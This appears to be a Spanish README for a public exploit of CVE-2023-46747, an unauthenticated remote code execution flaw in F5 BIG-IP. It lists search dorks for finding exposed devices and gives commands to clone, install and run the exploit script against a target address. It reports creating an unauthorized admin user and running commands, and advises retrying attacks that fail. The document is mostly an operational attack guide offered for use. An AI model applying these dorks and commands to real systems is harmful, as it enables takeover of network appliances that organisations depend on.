CVE 2023 46747 RCE

 (title="BIG-IP®" || icon_hash="-335242539")

 title:"BIG-IP®"

https://my.f5.com/manage/s/article/K000137353

1. En este momento, el usuario aquí es sólo admin :

2. Ejecute el script:

 git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

Comando ejecutado con éxito:

3. Se creó exitosamente un nuevo usuario sin autorización aquí:

La explotación falla en algunas versiones, referencia: https://twitter.com/joel_land/status/1729147886615818732.

1. P: ¿Falló la adquisición del token?
   R: No se puede decir que no debe haber vulnerabilidad en el sitio de prueba, porque crear un usuario sin autorización no es 100% exitoso. A veces no se crea un usuario en el primer paso por algún motivo, por lo que no se puede obtener el token en el segundo paso. Por tanto, mi sugerencia es intentarlo unas cuantas veces más. Si no funciona, puede significar que efectivamente no existe vulnerabilidad.

Puede utilizar este script https://github.com/BishopFox/bigip-scanner para recopilar información de la versión F5 BIG-IP. ¡Es genial!

descubrimiento de proyectos/plantillas-nuclei#8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747